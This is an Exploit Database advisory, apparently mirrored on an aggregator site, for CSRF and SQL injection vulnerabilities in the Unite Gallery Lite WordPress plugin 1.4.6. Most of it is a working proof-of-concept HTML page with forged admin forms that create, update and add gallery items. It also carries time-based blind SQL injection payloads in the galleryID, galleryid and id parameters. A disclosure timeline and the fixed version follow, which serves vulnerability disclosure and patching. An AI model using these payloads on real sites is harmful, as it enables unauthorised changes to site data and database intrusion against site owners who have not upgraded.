WordPress Plugin Unite Gallery Lite 1.4.6 – Multiple Vulnerabilities

• Exploit Database
• 18 阅读

• 作者： Nitin Venkatesh
  日期： 2015-07-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37705/

• # Title: Cross-Site Request Forgery & SQL Injection Vulnerabilities in Unite Gallery Lite WordPress Plugin v1.4.6
  # Submitter: Nitin Venkatesh
  # Product: Unite Gallery Lite WordPress Plugin
  # Product URL: https://wordpress.org/plugins/unite-gallery-lite/
  # Vulnerability Type: Cross-site Request Forgery [CWE-352], Improper
  Neutralization of Special Elements used in an SQL Command ('SQL
  Injection')[CWE-89]
  # Affected Versions: v1.4.6 and possibly below.
  # Tested versions: v1.4.6
  # Fixed Version: v1.5
  # Link to code diff: https://plugins.trac.wordpress.org/changeset/1178586/unite-gallery-lite
  # Changelog: https://wordpress.org/plugins/unite-gallery-lite/changelog/
  # CVE Status: New & Unassigned
  
  ## Product Information:
  
  The Unite Gallery is all in one image and video gallery for WordPress.
  
  ## Vulnerability Description:
  
  The admin forms of the Unite Gallery Lite WordPress Plugin are susceptible
  to CSRF. Additionally, the following parameters were found to be
  susceptible to SQLi -
  
  Form submitted to /wp-admin/admin-ajax.php:
  - data[galleryID]
  
  Form submitted to /wp-admin/admin.php:
  - galleryid
  - id
  
  ## Proof of Concept:
  
  <!DOCTYPE html>
  <html>
  <head>
  <title>CSRF + SQLi in Unite Gallery Lite WordPress Plugin v1.4.6</title>
  </head>
  <body>
  <h1>CSRF + SQLi in Unite Gallery Lite WordPress Plugin v1.4.6</h1>
  <p>CSRF - Create Gallery</p>
  <form action="http://localhost/wp-admin//admin-ajax.php" method="post">
  <input type="hidden" name="action" value='unitegallery_ajax_action' />
  <input type="hidden" name="client_action" value='create_gallery' />
  <input type="hidden" name="gallery_type" value='ug-carousel' />
  <input type="hidden" name="data[main][title]" value='test 2' />
  <input type="hidden" name="data[main][alias]" value='test2' />
  <input type="hidden" name="data[main][category]" value='new' />
  <input type="hidden" name="data[main][full_width]" value='true' />
  <input type="hidden" name="data[main][gallery_width]" value='1000' />
  <input type="submit" value="submit" />
  </form>
  
  <p>CSRF + SQLi - Update Gallery</p>
  <form action="http://localhost/wp-admin//admin-ajax.php" method="post">
  <input type="hidden" name="action" value='unitegallery_ajax_action' />
  <input type="hidden" name="client_action" value='update_gallery' />
  <input type="hidden" name="gallery_type" value='ug-carousel' />
  <input type="hidden" name="data[main][title]" value='test 2' />
  <input type="hidden" name="data[main][alias]" value='test2' />
  <input type="hidden" name="data[main][shortcode]" value='[unitegallery
  test2]' />
  <input type="hidden" name="data[main][category]" value='3' />
  <input type="hidden" name="data[main][full_width]" value='true' />
  <input type="hidden" name="data[main][gallery_width]" value='1000' />
  <input type="hidden" name="data[main][gallery_min_width]" value='150' />
  <input type="hidden" name="data[params][tile_width]" value='160' />
  <input type="hidden" name="data[params][tile_height]" value='160' />
  <input type="hidden" name="data[params][theme_gallery_padding]" value='0' />
  <input type="hidden" name="data[params][theme_carousel_align]"
  value='center' />
  <input type="hidden" name="data[params][theme_carousel_offset]" value='0' />
  <input type="hidden" name="data[params][gallery_shuffle]" value='false' />
  <input type="hidden" name="data[params][tile_image_resolution]"
  value='medium' />
  <input type="hidden" name="data[params][carousel_padding]" value='8' />
  <input type="hidden" name="data[params][carousel_space_between_tiles]"
  value='20' />
  <input type="hidden" name="data[params][carousel_scroll_duration]"
  value='500' />
  <input type="hidden" name="data[params][carousel_scroll_easing]"
  value='easeOutCubic' />
  <input type="hidden" name="data[params][carousel_autoplay]" value='true' />
  <input type="hidden" name="data[params][carousel_autoplay_timeout]"
  value='3000' />
  <input type="hidden" name="data[params][carousel_autoplay_direction]"
  value='right' />
  <input type="hidden" name="data[params][carousel_autoplay_pause_onhover]"
  value='true' />
  <input type="hidden" name="data[params][theme_enable_navigation]"
  value='true' />
  <input type="hidden" name="data[params][theme_navigation_enable_play]"
  value='true' />
  <input type="hidden" name="data[params][theme_navigation_align]"
  value='center' />
  <input type="hidden" name="data[params][theme_navigation_offset_hor]"
  value='0' />
  <input type="hidden" name="data[params][theme_navigation_position]"
  value='bottom' />
  <input type="hidden" name="data[params][theme_navigation_margin]"
  value='20' />
  <input type="hidden" name="data[params][theme_space_between_arrows]"
  value='5' />
  <input type="hidden" name="data[params][carousel_navigation_numtiles]"
  value='3' />
  <input type="hidden" name="data[params][position]" value='center' />
  <input type="hidden" name="data[params][margin_top]" value='0' />
  <input type="hidden" name="data[params][margin_bottom]" value='0' />
  <input type="hidden" name="data[params][margin_left]" value='0' />
  <input type="hidden" name="data[params][margin_right]" value='0' />
  <input type="hidden" name="data[params][tile_enable_action]" value='true' />
  <input type="hidden" name="data[params][tile_as_link]" value='false' />
  <input type="hidden" name="data[params][tile_link_newpage]" value='true' />
  <input type="hidden" name="data[params][tile_enable_border]" value='true' />
  <input type="hidden" name="data[params][tile_border_width]" value='3' />
  <input type="hidden" name="data[params][tile_border_color]" value='#f0f0f0'
  />
  <input type="hidden" name="data[params][tile_border_radius]" value='0' />
  <input type="hidden" name="data[params][tile_enable_outline]" value='true'
  />
  <input type="hidden" name="data[params][tile_outline_color]"
  value='#8b8b8b' />
  <input type="hidden" name="data[params][tile_enable_shadow]" value='false'
  />
  <input type="hidden" name="data[params][tile_shadow_h]" value='1' />
  <input type="hidden" name="data[params][tile_shadow_v]" value='1' />
  <input type="hidden" name="data[params][tile_shadow_blur]" value='3' />
  <input type="hidden" name="data[params][tile_shadow_spread]" value='2' />
  <input type="hidden" name="data[params][tile_shadow_color]" value='#8b8b8b'
  />
  <input type="hidden" name="data[params][tile_enable_image_effect]"
  value='false' />
  <input type="hidden" name="data[params][tile_image_effect_type]" value='bw'
  />
  <input type="hidden" name="data[params][tile_image_effect_reverse]"
  value='false' />
  <input type="hidden" name="data[params][tile_enable_overlay]" value='true'
  />
  <input type="hidden" name="data[params][tile_overlay_opacity]" value='0.4'
  />
  <input type="hidden" name="data[params][tile_overlay_color]"
  value='#000000' />
  <input type="hidden" name="data[params][tile_enable_icons]" value='true' />
  <input type="hidden" name="data[params][tile_show_link_icon]" value='false'
  />
  <input type="hidden" name="data[params][tile_space_between_icons]"
  value='26' />
  <input type="hidden" name="data[params][tile_enable_textpanel]"
  value='false' />
  <input type="hidden" name="data[params][tile_textpanel_source]"
  value='title' />
  <input type="hidden" name="data[params][tile_textpanel_always_on]"
  value='false' />
  <input type="hidden" name="data[params][tile_textpanel_appear_type]"
  value='slide' />
  <input type="hidden" name="data[params][tile_textpanel_padding_top]"
  value='8' />
  <input type="hidden" name="data[params][tile_textpanel_padding_bottom]"
  value='8' />
  <input type="hidden" name="data[params][tile_textpanel_padding_left]"
  value='11' />
  <input type="hidden" name="data[params][tile_textpanel_padding_right]"
  value='11' />
  <input type="hidden" name="data[params][tile_textpanel_bg_color]"
  value='#000000' />
  <input type="hidden" name="data[params][tile_textpanel_bg_opacity]"
  value='0.6' />
  <input type="hidden" name="data[params][tile_textpanel_title_color]"
  value='#ffffff' />
  <input type="hidden" name="data[params][tile_textpanel_title_text_align]"
  value='left' />
  <input type="hidden" name="data[params][tile_textpanel_title_font_size]"
  value='14' />
  <input type="hidden" name="data[params][tile_textpanel_title_bold]"
  value='true' />
  <input type="hidden" name="data[params][lightbox_type]" value='wide' />
  <input type="hidden" name="data[params][lightbox_hide_arrows_onvideoplay]"
  value='true' />
  <input type="hidden" name="data[params][lightbox_slider_control_zoom]"
  value='true' />
  <input type="hidden" name="data[params][gallery_mousewheel_role]"
  value='zoom' />
  <input type="hidden" name="data[params][lightbox_overlay_opacity]"
  value='1' />
  <input type="hidden" name="data[params][lightbox_overlay_color]"
  value='#000000' />
  <input type="hidden" name="data[params][lightbox_top_panel_opacity]"
  value='0.4' />
  <input type="hidden" name="data[params][lightbox_show_numbers]"
  value='true' />
  <input type="hidden" name="data[params][lightbox_numbers_size]" value='14'
  />
  <input type="hidden" name="data[params][lightbox_numbers_color]"
  value='#e5e5e5' />
  <input type="hidden" name="data[params][lightbox_show_textpanel]"
  value='true' />
  <input type="hidden" name="data[params][lightbox_textpanel_width]"
  value='550' />
  <input type="hidden" name="data[params][lightbox_textpanel_source]"
  value='title' />
  <input type="hidden" name="data[params][lightbox_textpanel_title_color]"
  value='#e5e5e5' />
  <input type="hidden"
  name="data[params][lightbox_textpanel_title_text_align]" value='left' />
  <input type="hidden"
  name="data[params][lightbox_textpanel_title_font_size]" value='14' />
  <input type="hidden" name="data[params][lightbox_textpanel_title_bold]"
  value='false' />
  <input type="hidden" name="data[params][lightbox_compact_overlay_opacity]"
  value='0.6' />
  <input type="hidden" name="data[params][lightbox_compact_overlay_color]"
  value='#000000' />
  <input type="hidden" name="data[params][lightbox_arrows_position]"
  value='sides' />
  <input type="hidden" name="data[params][lightbox_arrows_inside_alwayson]"
  value='false' />
  <input type="hidden" name="data[params][lightbox_compact_show_numbers]"
  value='true' />
  <input type="hidden" name="data[params][lightbox_compact_numbers_size]"
  value='14' />
  <input type="hidden" name="data[params][lightbox_compact_numbers_color]"
  value='#e5e5e5' />
  <input type="hidden"
  name="data[params][lightbox_compact_numbers_padding_top]" value='7' />
  <input type="hidden"
  name="data[params][lightbox_compact_numbers_padding_right]" value='5' />
  <input type="hidden" name="data[params][lightbox_compact_show_textpanel]"
  value='true' />
  <input type="hidden" name="data[params][lightbox_compact_textpanel_source]"
  value='title' />
  <input type="hidden"
  name="data[params][lightbox_compact_textpanel_title_color]" value='#e5e5e5'
  />
  <input type="hidden"
  name="data[params][lightbox_compact_textpanel_title_font_size]" value='14'
  />
  <input type="hidden"
  name="data[params][lightbox_compact_textpanel_title_bold]" value='false' />
  <input type="hidden"
  name="data[params][lightbox_compact_textpanel_padding_top]" value='5' />
  <input type="hidden"
  name="data[params][lightbox_compact_textpanel_padding_left]" value='10' />
  <input type="hidden"
  name="data[params][lightbox_compact_textpanel_padding_right]" value='10' />
  <input type="hidden"
  name="data[params][lightbox_compact_slider_image_border]" value='true' />
  <input type="hidden"
  name="data[params][lightbox_compact_slider_image_border_width]" value='10'
  />
  <input type="hidden"
  name="data[params][lightbox_compact_slider_image_border_color]"
  value='#ffffff' />
  <input type="hidden"
  name="data[params][lightbox_compact_slider_image_border_radius]" value='0'
  />
  <input type="hidden"
  name="data[params][lightbox_compact_slider_image_shadow]" value='true' />
  <input type="hidden" name="data[params][include_jquery]" value='true' />
  <input type="hidden" name="data[params][js_to_body]" value='false' />
  <input type="hidden" name="data[params][compress_output]" value='false' />
  <input type="hidden" name="data[params][gallery_debug_errors]"
  value='false' />
  
  <!-- SQLi -->
  <input type="hidden" name="data[galleryID]" value='1 AND (SELECT * FROM
  (SELECT(SLEEP(5)))rock)' />
  <input type="submit" value="submit" />
  </form>
  
  <p>CSRF - Add Items</p>
  <form action="http://localhost/wp-admin/admin-ajax.php" method="post">
  <input type="hidden" name="action" value='unitegallery_ajax_action' />
  <input type="hidden" name="client_action" value='add_item' />
  <input type="hidden" name="gallery_type" value='' />
  <input type="hidden" name="data[type]" value='html5video' />
  <input type="hidden" name="data[title]" value='test' />
  <input type="hidden" name="data[description]" value='' />
  <input type="hidden" name="data[urlImage]" value='' />
  <input type="hidden" name="data[urlThumb]" value='' />
  <input type="hidden" name="data[urlVideo_mp4]" value='
  http://video-js.zencoder.com/oceans-clip.mp4' />
  <input type="hidden" name="data[urlVideo_webm]" value='
  http://video-js.zencoder.com/oceans-clip.webm' />
  <input type="hidden" name="data[urlVideo_ogv]" value='
  http://video-js.zencoder.com/oceans-clip.ogv' />
  <input type="hidden" name="data[catID]" value='4' />
  <input type="submit" value="submit" />
  </form>
  
  <p>CSRF + SQLi - Retrieve Items (Edit Settings - Items Tab)</p>
  <form action="http://localhost/wp-admin/admin-ajax.php" method="post">
  <input type="hidden" name="action" value='unitegallery_ajax_action' />
  <input type="hidden" name="client_action" value='get_cat_items' />
  <input type="hidden" name="gallery_type" value='ug-carousel' />
  <input type="hidden" name="data[catID]" value='3' />
  
  <!-- SQLi -->
  <input type="hidden" name="data[galleryID]" value='1 AND (SELECT * FROM
  (SELECT(SLEEP(5)))rock)' />
  <input type="submit" value="submit" />
  </form>
  
  <p> CSRF + SQLi - Action buttons</p>
  <ul>
  <li>
  <a href="https://www.exploit-db.com/exploits/37705/
  http://localhost/wp-admin/admin.php?page=unitegallery&view=items&galleryid=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
  ">
  http://localhost/wp-admin/admin.php?page=unitegallery&view=items&galleryid=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
  </a></li>
  <li>
  <a href="https://www.exploit-db.com/exploits/37705/
  http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
  ">
  http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))rock)
  </a>
  </li>
  </ul>
  </body>
  </html>
  
  ## Solution:
  
  Upgrade to v1.5 or higher
  
  ## Disclosure Timeline:
  
  2015-06-06 - Discovered. Reported to developer.
  2015-06-10 - Updated version released.
  2015-07-25 - Publishing disclosure on FD mailing list
  
  ## Disclaimer:
  
  This disclosure is purely meant for educational purposes. I will in no way
  be responsible as to how the information in this disclosure is used.